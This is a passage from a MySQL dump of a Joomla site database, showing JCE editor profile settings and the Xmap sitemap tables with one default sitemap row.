Editor]\",\"toggle_state\":\"1\",\"relative_urls\":\"1\",\"verify_html\":\"\",\"schema\":\"\",\"forced_root_block\":\"\",\"profile_content_css\":\"2\",\"profile_content_css_custom\":\"\",\"theme_advanced_styles\":\"\",\"theme_advanced_blockformats\":[\"p\",\"div\",\"h1\",\"h2\",\"h3\",\"h4\",\"h5\",\"h6\",\"address\",\"code\",\"pre\",\"samp\",\"span\",\"section\",\"article\",\"hgroup\",\"aside\",\"figure\",\"dt\",\"dd\"],\"theme_advanced_fonts_add\":\"\",\"theme_advanced_fonts_remove\":\"\",\"theme_advanced_font_sizes\":\"\",\"custom_colors\":\"\",\"dir\":\"\",\"filesystem\":{\"name\":\"joomla\",\"joomla\":{\"allow_root\":\"0\",\"restrict_dir\":\"administrator,cache,components,includes,language,libraries,logs,media,modules,plugins,templates,xmlrpc\"}},\"max_size\":\"\",\"upload_conflict\":\"overwrite\",\"upload_runtimes\":[\"html5\",\"flash\",\"silverlight\",\"html4\"],\"browser_position\":\"bottom\",\"folder_tree\":\"1\",\"list_limit\":\"all\",\"validate_mimetype\":\"1\",\"websafe_mode\":\"utf-8\",\"websafe_allow_spaces\":\"0\",\"upload_add_random\":\"0\",\"invalid_elements\":\"\",\"invalid_attributes\":\"dynsrc,lowsrc\",\"invalid_attribute_values\":\"\",\"extended_elements\":\"\",\"allow_javascript\":\"1\",\"allow_css\":\"1\",\"allow_php\":\"1\",\"cdata\":\"1\"},\"browser\":{\"dir\":\"\",\"max_size\":\"\",\"extensions\":\"office=doc,docx,ppt,xls;image=gif,jpeg,jpg,png;acrobat=pdf;archive=zip,tar,gz,rar;flash=swf;quicktime=mov,mp4,qt;windowsmedia=wmv,asx,asf,avi;audio=wav,mp3,aiff;openoffice=odt,odg,odp,ods,odf\",\"filesystem\":{\"name\":\"\"},\"upload\":\"1\",\"folder_new\":\"1\",\"folder_delete\":\"1\",\"folder_rename\":\"1\",\"folder_move\":\"1\",\"file_delete\":\"1\",\"file_rename\":\"1\",\"file_move\":\"1\"},\"media\":{\"strict\":\"1\",\"iframes\":\"0\",\"audio\":\"1\",\"video\":\"1\",\"object\":\"1\",\"embed\":\"1\",\"version_flash\":\"10,1,53,64\",\"version_windowsmedia\":\"10,00,00,3646\",\"version_quicktime\":\"7,3,0,0\",\"version_java\":\"1,5,0,0\",\"version_shockwave\":\"10,2,0,023\"},\"paste\":{\"use_dialog\":\"0\",\"dialog_width\":\"450\",\"dialog_height\":\"400\",\"force_cleanup\":\"0\",\"strip_class_attributes\":\"all\",\"remove_spans\":\"0\",\"remove_styles\":\"0\",\"retain_style_properties\":\"\",\"remove_empty_paragraphs\":\"1\",\"remove_styles_if_webkit\":\"0\",\"html\":\"1\",\"text\":\"1\"},\"source\":{\"highlight\":\"1\",\"numbers\":\"1\",\"wrap\":\"1\",\"format\":\"1\",\"tag_closing\":\"1\",\"selection_match\":\"1\",\"theme\":\"textmate\"},\"table\":{\"width\":\"\",\"height\":\"\",\"border\":\"0\",\"cols\":\"2\",\"rows\":\"2\",\"cellpadding\":\"\",\"cellspacing\":\"\",\"align\":\"\",\"classes\":\"\",\"pad_empty_cells\":\"1\",\"buttons\":[\"table_insert\",\"delete_table\",\"row_props\",\"cell_props\",\"row_before\",\"row_after\",\"delete_row\",\"col_before\",\"col_after\",\"delete_col\",\"split_cells\",\"merge_cells\"]},\"xhtmlxtras\":{\"buttons\":[\"cite\",\"abbr\",\"acronym\",\"del\",\"ins\",\"attribs\"]},\"imgmanager\":{\"dir\":\"\",\"max_size\":\"\",\"extensions\":\"image=jpeg,jpg,png,gif\",\"filesystem\":{\"name\":\"\"},\"alt\":\"\",\"margin_top\":\"\",\"margin_right\":\"\",\"margin_bottom\":\"\",\"margin_left\":\"\",\"border\":\"0\",\"border_width\":\"1\",\"border_style\":\"solid\",\"border_color\":\"#000000\",\"align\":\"\",\"always_include_dimensions\":\"1\",\"style\":\"\",\"classes\":\"\",\"title\":\"\",\"id\":\"\",\"direction\":\"\",\"usemap\":\"\",\"longdesc\":\"\",\"tabs_rollover\":\"1\",\"tabs_advanced\":\"1\",\"attributes_dimensions\":\"1\",\"attributes_align\":\"1\",\"attributes_margin\":\"1\",\"attributes_border\":\"1\",\"upload\":\"1\",\"folder_new\":\"1\",\"folder_delete\":\"1\",\"folder_rename\":\"1\",\"folder_move\":\"1\",\"file_delete\":\"1\",\"file_rename\":\"1\",\"file_move\":\"1\",\"dragdrop_upload\":\"1\"},\"link\":{\"target\":\"\",\"id\":\"\",\"style\":\"\",\"classes\":\"\",\"dir\":\"\",\"hreflang\":\"\",\"lang\":\"\",\"charset\":\"\",\"type\":\"\",\"rel\":\"\",\"rev\":\"\",\"tabindex\":\"\",\"accesskey\":\"\",\"file_browser\":\"1\",\"tabs_advanced\":\"1\",\"attributes_anchor\":\"1\",\"attributes_target\":\"1\",\"links\":{\"joomlalinks\":{\"enable\":\"1\",\"content\":\"1\",\"article_alias\":\"1\",\"static\":\"1\",\"contacts\":\"1\",\"weblinks\":\"1\",\"weblinks_alias\":\"1\",\"menu\":\"1\"}},\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"1\"},\"window\":{\"enable\":\"1\"}},\"search\":{\"link\":{\"enable\":\"1\",\"plugins\":[\"categories\",\"contacts\",\"content\",\"newsfeeds\",\"weblinks\"]}}},\"spellchecker\":{\"engine\":\"browser\",\"browser_state\":\"0\",\"googlespell_languages\":[\"English=en\"],\"languages\":\"English=en\",\"pspell_mode\":\"PSPELL_FAST\",\"pspell_spelling\":\"\",\"pspell_jargon\":\"\",\"pspell_encoding\":\"\",\"pspell_dictionary\":\"components\\/com_jce\\/editor\\/tiny_mce\\/plugins\\/spellchecker\\/dictionary.pws\",\"pspellshell_aspell\":\"\\/usr\\/bin\\/aspell\",\"pspellshell_tmp\":\"\\/tmp\"},\"article\":{\"buttons\":[\"readmore\",\"pagebreak\"]}}'),(2,'Front End','Sample Front-end Profile','','3,4,5','',1,NULL,'help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;paste,searchreplace,indent,outdent,numlist,bullist,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars;fullscreen,preview,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','contextmenu,inlinepopups,help,paste,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,xhtmlxtras,imgmanager,link,spellchecker,article',0,2,0,'0000-00-00 00:00:00',''); /*!40000 ALTER TABLE `jos_wf_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_xmap_items` -- DROP TABLE IF EXISTS `jos_xmap_items`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_xmap_items` ( `uid` varchar(100) NOT NULL, `itemid` int(11) NOT NULL, `view` varchar(10) NOT NULL, `sitemap_id` int(11) NOT NULL, `properties` varchar(300) DEFAULT NULL, PRIMARY KEY (`uid`,`itemid`,`view`,`sitemap_id`), KEY `uid` (`uid`,`itemid`), KEY `view` (`view`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_xmap_items` -- LOCK TABLES `jos_xmap_items` WRITE; /*!40000 ALTER TABLE `jos_xmap_items` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_xmap_items` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_xmap_sitemap` -- DROP TABLE IF EXISTS `jos_xmap_sitemap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_xmap_sitemap` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(255) DEFAULT NULL, `alias` varchar(255) DEFAULT NULL, `introtext` text, `metadesc` text, `metakey` text, `attribs` text, `selections` text, `excluded_items` text, `is_default` int(1) DEFAULT '0', `state` int(2) DEFAULT NULL, `access` int(11) DEFAULT NULL, `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `count_xml` int(11) DEFAULT NULL, `count_html` int(11) DEFAULT NULL, `views_xml` int(11) DEFAULT NULL, `views_html` int(11) DEFAULT NULL, `lastvisit_xml` int(11) DEFAULT NULL, `lastvisit_html` int(11) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_xmap_sitemap` -- LOCK TABLES `jos_xmap_sitemap` WRITE; /*!40000 ALTER TABLE `jos_xmap_sitemap` DISABLE KEYS */; INSERT INTO `jos_xmap_sitemap` VALUES (1,'Site Map','site-map','',NULL,NULL,'{\"showintro\":\"1\",\"show_menutitle\":\"1\",\"classname\":\"\",\"columns\":\"\",\"exlinks\":\"img_blue.gif\",\"compress_xml\":\"1\",\"beautify_xml\":\"1\",\"news_publication_name\":\"\"}','{\"mainmenu\":{\"priority\":\"0.5\",\"changefreq\":\"daily\",\"ordering\":0},\"side-menu\":{\"priority\":\"0.5\",\"changefreq\":\"daily\",\"ordering\":1}}',NULL,1,1,1,'2013-06-13 09:39:42',0,15,0,1911,0,1483184639); /*!40000 ALTER TABLE `jos_xmap_sitemap` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database 'hallcrestheights_cms' -- /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2018-04-18 0:47:31